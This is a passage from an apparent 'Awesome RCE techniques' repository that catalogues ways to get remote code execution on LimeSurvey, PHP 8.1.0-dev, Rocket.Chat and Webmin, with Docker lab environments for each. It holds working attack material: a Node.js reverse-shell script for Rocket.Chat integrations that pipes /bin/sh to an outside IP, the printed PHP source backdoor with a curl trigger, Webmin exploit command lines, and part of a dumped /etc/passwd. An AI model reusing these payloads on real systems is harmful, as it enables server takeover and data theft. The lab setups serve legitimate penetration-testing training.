irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin 50 | gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin 51 | nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin 52 | _apt:x:100:65534::/nonexistent:/usr/sbin/nologin 53 | mysql:x:101:101:MySQL Server,,,:/nonexistent:/bin/false 54 | ``` 55 | 56 | 57 | ### Step 3: The interactive console 58 | 59 | When your webshell is active, you can now use the interactive [console.py](https://github.com/p0dalirius/LimeSurvey-plugin-webshell/blob/main/console.py) to execute commands and download remote files. 60 | 61 | https://user-images.githubusercontent.com/79218792/163652719-eb16acba-6e2c-47a2-bc52-21ceff24dc09.mp4 62 | 63 | ## References 64 | - https://github.com/p0dalirius/LimeSurvey-plugin-webshell 65 | -------------------------------------------------------------------------------- /Other/LimeSurvey/techniques/Upload-a-plugin/imgs/configuration_plugins.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Other/LimeSurvey/techniques/Upload-a-plugin/imgs/configuration_plugins.png -------------------------------------------------------------------------------- /Other/LimeSurvey/techniques/Upload-a-plugin/imgs/exec_code_web.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Other/LimeSurvey/techniques/Upload-a-plugin/imgs/exec_code_web.png -------------------------------------------------------------------------------- /Other/LimeSurvey/techniques/Upload-a-plugin/imgs/upload_and_install.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Other/LimeSurvey/techniques/Upload-a-plugin/imgs/upload_and_install.png -------------------------------------------------------------------------------- /Other/LimeSurvey/techniques/Upload-a-plugin/technique.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "LimeSurvey - Upload a plugin", 3 | "work_in_progress": false, 4 | "references": [ 5 | "https://github.com/p0dalirius/LimeSurvey-plugin-webshell" 6 | ] 7 | } -------------------------------------------------------------------------------- /Other/LimeSurvey/techniques/Upload-a-plugin/test_env/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM debian:buster 2 | 3 | RUN apt-get -y -q update; \ 4 | apt-get -y -q install apache2 xxd git unzip wget php php-simplexml php-gd php-ldap php-zip php-imap php-mysql php-mbstring mariadb-client mariadb-server 5 | 6 | RUN service mysql start;\ 7 | mysql -u root -e "CREATE USER 'db'@'%' IDENTIFIED BY 'db'; UPDATE mysql.user set plugin = 'mysql_native_password' WHERE User = 'db'; GRANT ALL PRIVILEGES ON *.* TO 'db'@'%' WITH GRANT OPTION; FLUSH PRIVILEGES;" 8 | 9 | RUN wget https://github.com/LimeSurvey/LimeSurvey/archive/refs/tags/5.2.4+211129.zip -O /tmp/LimeSurvey.zip ;\ 10 | cd /var/www/html/; rm index.html; unzip /tmp/LimeSurvey.zip; mv LimeSurvey-5.2.4-211129/* . 11 | 12 | RUN chown www-data: -R /var/www/ 13 | 14 | RUN echo "#!/bin/bash" > /entrypoint.sh ;\ 15 | echo "service mysql start" >> /entrypoint.sh ;\ 16 | echo "apachectl -D FOREGROUND" >> /entrypoint.sh ;\ 17 | chmod +x /entrypoint.sh 18 | 19 | EXPOSE 80 20 | 21 | CMD /entrypoint.sh 22 | -------------------------------------------------------------------------------- /Other/LimeSurvey/techniques/Upload-a-plugin/test_env/Makefile: -------------------------------------------------------------------------------- 1 | .PHONY: build img 2 | 3 | IMGNAME := awesome_rce_limesurvey_upload_plugin 4 | PORT := 10080 5 | 6 | all : build 7 | 8 | build: 9 | docker build -t $(IMGNAME):latest -f Dockerfile . 10 | 11 | start: 12 | docker run --rm -it -p $(PORT):80 $(IMGNAME) 13 | 14 | background: 15 | docker run --rm -d -p $(PORT):80 $(IMGNAME) 16 | 17 | shell: 18 | docker exec -it $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') bash 19 | 20 | stop: 21 | docker stop $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') -------------------------------------------------------------------------------- /Other/PHP/README.md: -------------------------------------------------------------------------------- 1 | # PHP 2 | 3 | PHP is a general-purpose scripting language geared toward web development. It was originally created by Danish-Canadian programmer Rasmus Lerdorf in 1994. The PHP reference implementation is now produced by The PHP Group. PHP originally stood for Personal Home Page, but it now stands for the recursive initialism PHP: Hypertext Preprocessor. 4 | 5 | - Official site: https://www.php.net/ 6 | - PHP engine source code: https://github.com/php/php-src/ 7 | 8 | ## Techniques to achieve RCE with PHP 9 | 10 | ### Version specific 11 | 12 | - [PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution](./techniques/PHP-8.1.0-dev-User-Agentt-RCE/README.md) 13 | 14 | -------------------------------------------------------------------------------- /Other/PHP/techniques/PHP-8.1.0-dev-User-Agentt-RCE/README.md: -------------------------------------------------------------------------------- 1 | # PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution 2 | 3 | ## Requirements 4 | 5 | - The server needs to run on a specific backdoored version of PHP (PHP-8.1.0-dev) 6 | 7 | ## Introduction 8 | 9 | A compromised git account pushed code to the PHP source repository introducing a backdoor in commit [c730aa26bd52829a49f2ad284b181b7e82a68d7d](https://github.com/php/php-src/commit/c730aa26bd52829a49f2ad284b181b7e82a68d7d): 10 | 11 | ```c 12 | { 13 | zval zoh; 14 | php_output_handler *h; 15 | zval *enc; 16 | 17 | if ((Z_TYPE(PG(http_globals)[TRACK_VARS_SERVER]) == IS_ARRAY || zend_is_auto_global_str(ZEND_STRL("_SERVER"))) && 18 | (enc = zend_hash_str_find(Z_ARRVAL(PG(http_globals)[TRACK_VARS_SERVER]), "HTTP_USER_AGENTT", sizeof("HTTP_USER_AGENTT") - 1))) { 19 | convert_to_string(enc); 20 | if (strstr(Z_STRVAL_P(enc), "zerodium")) { 21 | zend_try { 22 | zend_eval_string(Z_STRVAL_P(enc)+8, NULL, "REMOVETHIS: sold to zerodium, mid 2017"); 23 | } zend_end_try(); 24 | } 25 | } 26 | } 27 | ``` 28 | 29 | This code evaluates a string contained in the `User-Agentt` header if this string starts with `zerodium`. 30 | 31 | ## Exploitation 32 | 33 | You can execute PHP code (prefixed by the string `zerodium`) on the remote machine through the `User-Agentt` header: 34 | 35 | ```sh 36 | curl -H 'Accept-Encoding: deflate' -H "User-Agentt: zerodiumsystem('id');" 'http://127.0.0.1:10080/dummy.php' 37 | ``` 38 | 39 | ## References 40 | - https://flast101.github.io/php-8.1.0-dev-backdoor-rce/ 41 | - https://news-web.php.net/php.internals/113838 42 | -------------------------------------------------------------------------------- /Other/PHP/techniques/PHP-8.1.0-dev-User-Agentt-RCE/imgs/phpinfo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Other/PHP/techniques/PHP-8.1.0-dev-User-Agentt-RCE/imgs/phpinfo.png -------------------------------------------------------------------------------- /Other/PHP/techniques/PHP-8.1.0-dev-User-Agentt-RCE/technique.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution", 3 | "work_in_progress": false, 4 | "references": [ 5 | "https://flast101.github.io/php-8.1.0-dev-backdoor-rce/", 6 | "https://news-web.php.net/php.internals/113838" 7 | ] 8 | } -------------------------------------------------------------------------------- /Other/PHP/techniques/PHP-8.1.0-dev-User-Agentt-RCE/test_env/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM debian:buster 2 | 3 | RUN apt-get -y -q update \ 4 | && apt-get -y -q install wget tar git pkg-config build-essential autoconf bison re2c libxml2-dev libsqlite3-dev libapr1-dev libaprutil1-dev libpcre3 libpcre3-dev zlib1g-dev libpng-dev 5 | 6 | # Building and installing apache2 7 | RUN mkdir -p /build/ \ 8 | && cd /build/ \ 9 | && wget https://dlcdn.apache.org/httpd/httpd-2.4.54.tar.gz -O httpd.tar.gz \ 10 | && tar xvf httpd.tar.gz \ 11 | && cd httpd-2.4.54/ \ 12 | && ./configure --enable-so \ 13 | && make \ 14 | && make install 15 | 16 | # Building and installing php-8.1.0-dev 17 | RUN mkdir -p /build/ \ 18 | && cd /build/ \ 19 | && git clone https://github.com/php/php-src/ /build/php/ \ 20 | && cd /build/php/ \ 21 | && git checkout c730aa26bd52829a49f2ad284b181b7e82a68d7d \ 22 | && ./buildconf \ 23 | && ./configure --with-apxs2=/usr/local/apache2/bin/apxs --with-pdo-mysql \ 24 | && make -j4 \ 25 | && make install \ 26 | && echo "LoadModule php_module /build/php/libs/libphp.so" >> /usr/local/apache2/conf/httpd.conf \ 27 | && echo '' >> /usr/local/apache2/conf/httpd.conf \ 28 | && echo ' SetHandler application/x-httpd-php' >> /usr/local/apache2/conf/httpd.conf \ 29 | && echo '' >> /usr/local/apache2/conf/httpd.conf 30 | 31 | RUN mkdir -p /usr/local/apache2/htdocs \ 32 | && rm /usr/local/apache2/htdocs/index.html \ 33 | && echo '

Dummy in HTML

' > /usr/local/apache2/htdocs/dummy.html \ 34 | && echo '

Dummy in PHP

"; ?>' > /usr/local/apache2/htdocs/dummy.php \ 35 | && echo '' > /usr/local/apache2/htdocs/phpinfo.php \ 36 | && chown www-data: -R /usr/local/apache2/htdocs/ 37 | 38 | RUN echo "#!/bin/bash" > /entrypoint.sh \ 39 | && echo "echo '===[Checking if backdoor is here]========================================================================'" >> /entrypoint.sh \ 40 | && echo "grep -rain zerodium -n5 /build/php/ext/zlib/zlib.c" >> /entrypoint.sh \ 41 | && echo "echo '========================================================================================================='" >> /entrypoint.sh \ 42 | && echo "/usr/local/apache2/bin/apachectl -D FOREGROUND" >> /entrypoint.sh \ 43 | && chmod +x /entrypoint.sh 44 | 45 | EXPOSE 80 46 | 47 | CMD /bin/bash 48 | 49 | -------------------------------------------------------------------------------- /Other/PHP/techniques/PHP-8.1.0-dev-User-Agentt-RCE/test_env/Makefile: -------------------------------------------------------------------------------- 1 | .PHONY: build img 2 | 3 | IMGNAME := awesome_rce_php_8_1_0_dev_backdoor 4 | PORT := 10080 5 | 6 | all : build 7 | 8 | build: 9 | docker build -t $(IMGNAME):latest -f Dockerfile . 10 | 11 | start: 12 | docker run --rm -it -p $(PORT):80 $(IMGNAME) 13 | 14 | background: 15 | docker run --rm -d -p $(PORT):80 $(IMGNAME) 16 | 17 | shell: 18 | docker exec -it $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') bash 19 | 20 | stop: 21 | docker stop $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') -------------------------------------------------------------------------------- /Other/README.md: -------------------------------------------------------------------------------- 1 | # Other 2 | 3 | ## Softwares 4 | 5 | - [**GiTea**: (1 technique)](./GiTea/) 6 | - [**Gitlab**: (1 technique)](./Gitlab/) 7 | - [**Jenkins**: (1 technique)](./Jenkins/) 8 | - [**LimeSurvey**: (1 technique)](./LimeSurvey/) 9 | - [**PHP**: (1 technique)](./PHP/) 10 | - [**Rocket.Chat**: (1 technique)](./Rocket.Chat/) 11 | - [**Webmin**: (1 technique)](./Webmin/) 12 | -------------------------------------------------------------------------------- /Other/Rocket.Chat/README.md: -------------------------------------------------------------------------------- 1 | # Rocket.Chat 2 | 3 | Rocket.Chat is an open-source fully customizable communications platform developed in JavaScript for organizations with high standards of data protection. 4 | 5 | - Official site: https://rocket.chat/ 6 | - Source code: https://github.com/RocketChat/Rocket.Chat 7 | 8 | ## Techniques to achieve RCE with RockChat 9 | 10 | ### With admin credentials 11 | 12 | - [Add-an-integration-script](techniques/Add-an-integration-script/README.md) 13 | 14 | 15 | -------------------------------------------------------------------------------- /Other/Rocket.Chat/techniques/Add-an-integration-script/README.md: -------------------------------------------------------------------------------- 1 | # Rocket.Chat - Add an integration script 2 | 3 | ## Requirements 4 | 5 | - Username and password of an admin account 6 | 7 | ## Exploitation 8 | 9 | Once you're connected, you have access to the main dashboard at http://TARGET/channel/general: 10 | 11 | ![](./imgs/dashboard.png) 12 | 13 | ### Accessing the admin dashboard 14 | 15 | Then you should be able to access the admin dashboard at http://TARGET/admin/info: 16 | 17 | ![](./imgs/admin_page.png) 18 | 19 | ### Adding an integration script 20 | 21 | Once on the admin dashboard, go to the "Integrations" page at http://TARGET/admin/integrations and create a new integration by clicking on the "+New" button or go at http://TARGET/admin/integrations/new/incoming: 22 | 23 | ![](./imgs/add_integration.png) 24 | 25 | On this new page to create a new integration, we need to fill the "Post as" field with our username, and the "Post to Channel" with the name of a known channel or our username prefixed by `@`. Don't forget to enable the integration by clicking on the enable switch on top of the page (If you forgot to do this you'll get a "Service Unavailable" in response of your POST request): 26 | 27 | ![](./imgs/add_integration_page.png) 28 | 29 | Once this is done, we need to scroll down the page to the "Script" section, and add a script creating a reverse shell. You can use the following script: 30 | 31 | ```js 32 | class Script { 33 | process_incoming_request({ request }) { 34 | const require = console.log.constructor('return process.mainModule.require')(); 35 | const { execSync } = require('child_process'); 36 | var net = require("net"), 37 | cp = require("child_process"), 38 | sh = cp.spawn("/bin/sh", []); 39 | var client = new net.Socket(); 40 | client.connect(4444, "192.168.1.27", function(){ 41 | client.pipe(sh.stdin); 42 | sh.stdout.pipe(client); 43 | sh.stderr.pipe(client); 44 | }); 45 | return {} 46 | } 47 | } 48 | ``` 49 | 50 | Here is the same script but minified: 51 | 52 | ```js 53 | class Script{process_incoming_request({request}){const require=console.log.constructor('return process.mainModule.require')();const {execSync}=require('child_process');var n = require("net"),c=require("child_process"),p = c.spawn("/bin/sh",[]);var s = new n.Socket();s.connect(4444,"192.168.1.27",function(){s.pipe(p.stdin);p.stdout.pipe(s);p.stderr.pipe(s);});return {}}} 54 | ``` 55 | 56 | Then enable it by clicking on the enable switch on top of the "Script" textarea and save this integration by clicking on "Save" at the bottom of the page. 57 | 58 | ![](./imgs/script_added.png) 59 | 60 | ### Triggering the integration 61 | 62 | Now that the integration script is installed in Rocket.Chat, we need to trigger it with a POST request to a specific endpoint. To get this endpoint or directly the cURL command to access it, go back on the integration you just created and scroll down to the bottom of the page. 63 | 64 | ![](./imgs/getting_webhook_url.png) 65 | 66 | Then we start a listener with `nc -lvnp 4444` in a terminal, and we launch the cURL command in another: 67 | 68 | ```sh 69 | curl -X POST -H 'Content-Type: application/json' --data '{"text":"Example message"}' http://localhost:13000/hooks/YhhM5pSETkxH5yChf/4PW68bZhXbojY5sreznALpWL8tnYe8g7NtJh4FXqMrYorBkG 70 | ``` 71 | 72 | And we get a reverse shell on the Rocket.Chat server: 73 | 74 | ![](./imgs/got_shell.png) 75 | 76 | ## References 77 | - https://docs.rocket.chat/quick-start/deploying-rocket.chat/rapid-deployment-methods/docker-and-docker-compose/docker-containers/available-images 78 | - https://hackerone.com/reports/1130721 79 | - https://blog.sonarsource.com/nosql-injections-in-rocket-chat/ -------------------------------------------------------------------------------- /Other/Rocket.Chat/techniques/Add-an-integration-script/imgs/add_integration.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Other/Rocket.Chat/techniques/Add-an-integration-script/imgs/add_integration.png -------------------------------------------------------------------------------- /Other/Rocket.Chat/techniques/Add-an-integration-script/imgs/add_integration_page.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Other/Rocket.Chat/techniques/Add-an-integration-script/imgs/add_integration_page.png -------------------------------------------------------------------------------- /Other/Rocket.Chat/techniques/Add-an-integration-script/imgs/admin_page.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Other/Rocket.Chat/techniques/Add-an-integration-script/imgs/admin_page.png -------------------------------------------------------------------------------- /Other/Rocket.Chat/techniques/Add-an-integration-script/imgs/dashboard.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Other/Rocket.Chat/techniques/Add-an-integration-script/imgs/dashboard.png -------------------------------------------------------------------------------- /Other/Rocket.Chat/techniques/Add-an-integration-script/imgs/getting_webhook_url.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Other/Rocket.Chat/techniques/Add-an-integration-script/imgs/getting_webhook_url.png -------------------------------------------------------------------------------- /Other/Rocket.Chat/techniques/Add-an-integration-script/imgs/got_shell.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Other/Rocket.Chat/techniques/Add-an-integration-script/imgs/got_shell.png -------------------------------------------------------------------------------- /Other/Rocket.Chat/techniques/Add-an-integration-script/imgs/integration_enabled.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Other/Rocket.Chat/techniques/Add-an-integration-script/imgs/integration_enabled.png -------------------------------------------------------------------------------- /Other/Rocket.Chat/techniques/Add-an-integration-script/imgs/script_added.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Other/Rocket.Chat/techniques/Add-an-integration-script/imgs/script_added.png -------------------------------------------------------------------------------- /Other/Rocket.Chat/techniques/Add-an-integration-script/imgs/service_unavaible.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Other/Rocket.Chat/techniques/Add-an-integration-script/imgs/service_unavaible.png -------------------------------------------------------------------------------- /Other/Rocket.Chat/techniques/Add-an-integration-script/technique.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "Rocket.Chat - Add an integration script", 3 | "work_in_progress": false, 4 | "references": [ 5 | "https://docs.rocket.chat/quick-start/deploying-rocket.chat/rapid-deployment-methods/docker-and-docker-compose/docker-containers/available-images", 6 | "https://hackerone.com/reports/1130721", 7 | "https://blog.sonarsource.com/nosql-injections-in-rocket-chat/" 8 | ] 9 | } -------------------------------------------------------------------------------- /Other/Rocket.Chat/techniques/Add-an-integration-script/test_env/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM rocketchat/rocket.chat.preview:3.12.1 2 | 3 | # Here I use the "preview" image because it deploys a container with a database inside 4 | # it's useful for quickly trying or running tests, not requiring a dedicated database installation 5 | 6 | # Setup is at http://localhost:13000/setup-wizard/1 -------------------------------------------------------------------------------- /Other/Rocket.Chat/techniques/Add-an-integration-script/test_env/Makefile: -------------------------------------------------------------------------------- 1 | .PHONY: build img 2 | 3 | IMGNAME := awesome_rce_rocketchat_add_integration 4 | 5 | all : build start 6 | 7 | build: 8 | docker build -t $(IMGNAME):latest -f Dockerfile . 9 | 10 | start: 11 | docker run --rm -it -p 13000:3000 $(IMGNAME) 12 | 13 | background: 14 | docker run --rm -d -p 13000:3000 $(IMGNAME) 15 | 16 | shell: 17 | docker exec -it $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') bash 18 | 19 | stop: 20 | docker stop $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') -------------------------------------------------------------------------------- /Other/Webmin/README.md: -------------------------------------------------------------------------------- 1 | # Webmin 2 | 3 | Webmin is a powerful and flexible web-based server management control panel for Unix-like systems. 4 | 5 | - Official site: https://www.webmin.com/ 6 | - Source code: https://github.com/webmin/webmin/ 7 | 8 | ## Techniques to achieve RCE with Webmin 9 | 10 | ### Version specific 11 | 12 | - [CVE-2022-36446: Webmin 1.996 - Remote Code Execution (RCE) (Authenticated)](techniques/CVE-2022-36446_-_Webmin_1.996_authenticated_rce/README.md) 13 | 14 | 15 | -------------------------------------------------------------------------------- /Other/Webmin/techniques/CVE-2022-36446_-_Webmin_1.996_authenticated_rce/README.md: -------------------------------------------------------------------------------- 1 | # Webmin < 1.997 - CVE-2022-36446 Remote Code Execution (RCE) (Authenticated) 2 | 3 | ## Requirements 4 | 5 | - Username and password of an account with rights to access to "Software packages Updates" 6 | 7 | ## Checking requirements 8 | 9 | If we want to check the requirements for this exploit, we first need to login to Webmin using the username and password: 10 | 11 | ![](./imgs/login.png) 12 | 13 | Then we need to have access to the "Software Package Updates" page (at: https://TARGET/package-updates/index.cgi?mode=updates&xnavigation=1) 14 | 15 | ![](./imgs/software_package_updates.png) 16 | 17 | If both of these steps are completed successfully, we can now exploit this Webmin. 18 | 19 | ## Exploitation 20 | 21 | Given that we need to authenticate to the Webmin and send a post request with a few parameters, it's easier to use a script for this technique. In the following tutorial we will use @p0dalirius's script: https://github.com/p0dalirius/CVE-2022-36446-Webmin-Software-Package-Updates-RCE 22 | 23 | ### Single command 24 | 25 | We can launch a single command on the remote machine with option `--command`: 26 | 27 | ``` 28 | ./CVE-2022-36446.py -t https://localhost:10080/ -u root -p root -k --interactive 29 | ``` 30 | 31 | ![](./imgs/exploit_single_command_mode.png) 32 | 33 | ### Interactive mode 34 | 35 | We can also start it in interactive mode with option `--interactive` to get a pseudo-shell: 36 | 37 | ``` 38 | ./CVE-2022-36446.py -t https://localhost:10080/ -u root -p root -k --interactive 39 | ``` 40 | 41 | ![](./imgs/exploit_interactive_mode.png) 42 | 43 | ## Demonstration 44 | 45 | https://user-images.githubusercontent.com/79218792/184222596-3878e169-92ec-4507-99b5-3fe2c1d39360.mp4 46 | 47 | ## References 48 | - https://github.com/p0dalirius/CVE-2022-36446-Webmin-Software-Package-Updates-RCE 49 | - https://medium.com/@emirpolat/cve-2022-36446-webmin-1-997-7a9225af3165 50 | - https://nvd.nist.gov/vuln/detail/CVE-2022-36446 51 | - https://netix.dl.sourceforge.net/project/webadmin/webmin/1.996/webmin-1.996.tar.gz 52 | - https://github.com/advisories/GHSA-3q8j-9w3h-v6p5 53 | -------------------------------------------------------------------------------- /Other/Webmin/techniques/CVE-2022-36446_-_Webmin_1.996_authenticated_rce/imgs/exploit_interactive_mode.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Other/Webmin/techniques/CVE-2022-36446_-_Webmin_1.996_authenticated_rce/imgs/exploit_interactive_mode.png -------------------------------------------------------------------------------- /Other/Webmin/techniques/CVE-2022-36446_-_Webmin_1.996_authenticated_rce/imgs/exploit_single_command_mode.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Other/Webmin/techniques/CVE-2022-36446_-_Webmin_1.996_authenticated_rce/imgs/exploit_single_command_mode.png -------------------------------------------------------------------------------- /Other/Webmin/techniques/CVE-2022-36446_-_Webmin_1.996_authenticated_rce/imgs/login.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Other/Webmin/techniques/CVE-2022-36446_-_Webmin_1.996_authenticated_rce/imgs/login.png -------------------------------------------------------------------------------- /Other/Webmin/techniques/CVE-2022-36446_-_Webmin_1.996_authenticated_rce/imgs/software_package_updates.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Other/Webmin/techniques/CVE-2022-36446_-_Webmin_1.996_authenticated_rce/imgs/software_package_updates.png -------------------------------------------------------------------------------- /Other/Webmin/techniques/CVE-2022-36446_-_Webmin_1.996_authenticated_rce/technique.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "Webmin < 1.997 - CVE-2022-36446 Remote Code Execution (RCE) (Authenticated)", 3 | "work_in_progress": false, 4 | "references": [ 5 | "https://github.com/p0dalirius/CVE-2022-36446-Webmin-Software-Package-Updates-RCE", 6 | "https://medium.com/@emirpolat/cve-2022-36446-webmin-1-997-7a9225af3165", 7 | "https://nvd.nist.gov/vuln/detail/CVE-2022-36446", 8 | "https://netix.dl.sourceforge.net/project/webadmin/webmin/1.996/webmin-1.996.tar.gz", 9 | "https://github.com/advisories/GHSA-3q8j-9w3h-v6p5" 10 | ] 11 | } -------------------------------------------------------------------------------- /Other/Webmin/techniques/CVE-2022-36446_-_Webmin_1.996_authenticated_rce/test_env/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM debian:buster 2 | 3 | RUN apt-get -y -q update \ 4 | && apt-get -y -q install wget tar git libnet-ssleay-perl libauthen-pam-perl libio-pty-perl unzip shared-mime-info 5 | 6 | RUN mkdir -p /webmin/ \ 7 | && wget https://github.com/webmin/webmin/releases/download/1.996/webmin_1.996_all.deb -O /webmin/webmin.deb \ 8 | && dpkg -i /webmin/webmin.deb 9 | 10 | RUN useradd -s /bin/bash webmin \ 11 | && echo "webmin:webmin" | chpasswd \ 12 | && echo "root:root" | chpasswd 13 | 14 | RUN echo "#!/bin/bash" > /entrypoint.sh \ 15 | && echo "cd /usr/share/webmin" >> /entrypoint.sh \ 16 | && echo "./webmin-init start" >> /entrypoint.sh \ 17 | && echo "./webmin-init status" >> /entrypoint.sh \ 18 | && echo "tail -f /var/webmin/miniserv.error" >> /entrypoint.sh \ 19 | && chmod +x /entrypoint.sh 20 | 21 | EXPOSE 80 22 | 23 | CMD /entrypoint.sh 24 | -------------------------------------------------------------------------------- /Other/Webmin/techniques/CVE-2022-36446_-_Webmin_1.996_authenticated_rce/test_env/Makefile: -------------------------------------------------------------------------------- 1 | .PHONY: build img 2 | 3 | IMGNAME := awesome_rce_webmin_1_996 4 | PORT := 10080 5 | 6 | all : build 7 | 8 | build: 9 | docker build -t $(IMGNAME):latest -f Dockerfile . 10 | 11 | start: build 12 | docker run --rm -it -p $(PORT):10000 $(IMGNAME) 13 | 14 | background: 15 | docker run --rm -d -p $(PORT):10000 $(IMGNAME) 16 | 17 | shell: 18 | docker exec -it $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') bash 19 | 20 | stop: 21 | docker stop $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Awesome RCE techniques 2 | 3 |

4 | Awesome list of techniques to achieve Remote Code Execution (RCE) on various apps! 5 |
6 | Number of RCE techniques 7 | 8 | YouTube Channel Subscribers 9 |
10 |

11 | 12 | ## Goal of this project 13 | 14 | The goal of this project is to provide an OpenSource knowledge database of all the techniques to achieve Remote Code Execution (RCE) on various applications. All of these techniques also comes with a test environnement (usually a Docker image) for you to train these techniques. 15 | 16 | ## Techniques 17 | 18 | 19 | - [Content-Management-Systems-(CMS)](./Content-Management-Systems-(CMS)/) 20 | + [**Drupal**: (3 techniques)](./Content-Management-Systems-(CMS)/Drupal/) 21 | + [**FuelCMS**: (1 technique)](./Content-Management-Systems-(CMS)/FuelCMS/) 22 | + [**Joomla**: (1 technique)](./Content-Management-Systems-(CMS)/Joomla/) 23 | + [**SweetRice**: (2 techniques)](./Content-Management-Systems-(CMS)/SweetRice/) 24 | + [**Typo3**: (1 technique)](./Content-Management-Systems-(CMS)/Typo3/) 25 | + [**Wordpress**: (3 techniques)](./Content-Management-Systems-(CMS)/Wordpress/) 26 | 27 | 28 | - [Frameworks](./Frameworks/) 29 | + [**Apache-Tomcat**: (2 techniques)](./Frameworks/Apache-Tomcat/) 30 | + [**JBoss**: (1 technique)](./Frameworks/JBoss/) 31 | + [**JoGet**: (1 technique)](./Frameworks/JoGet/) 32 | + [**WildFly**: (1 technique)](./Frameworks/WildFly/) 33 | 34 | 35 | - [Learning-Management-Systems-(LMS)](./Learning-Management-Systems-(LMS)/) 36 | + [**Moodle**: (1 technique)](./Learning-Management-Systems-(LMS)/Moodle/) 37 | 38 | 39 | - [Other](./Other/) 40 | + [**GiTea**: (1 technique)](./Other/GiTea/) 41 | + [**Gitlab**: (1 technique)](./Other/Gitlab/) 42 | + [**Jenkins**: (1 technique)](./Other/Jenkins/) 43 | + [**LimeSurvey**: (1 technique)](./Other/LimeSurvey/) 44 | + [**PHP**: (1 technique)](./Other/PHP/) 45 | + [**Rocket.Chat**: (1 technique)](./Other/Rocket.Chat/) 46 | + [**Webmin**: (1 technique)](./Other/Webmin/) 47 | 48 | 49 | 50 | ## Work in progress 51 | 52 | These techniques are a work in progress. You can help us finish them by opening a pull request! 53 | 54 | 55 | 56 | ## Troubleshooting 57 | 58 | Report all the issues on https://github.com/p0dalirius/Awesome-RCE-techniques/issues. 59 | 60 | ## Contributors 61 | 62 | Pull requests are welcome. Feel free to open an issue if you want to add other Remote Code Execution (RCE) techniques. --------------------------------------------------------------------------------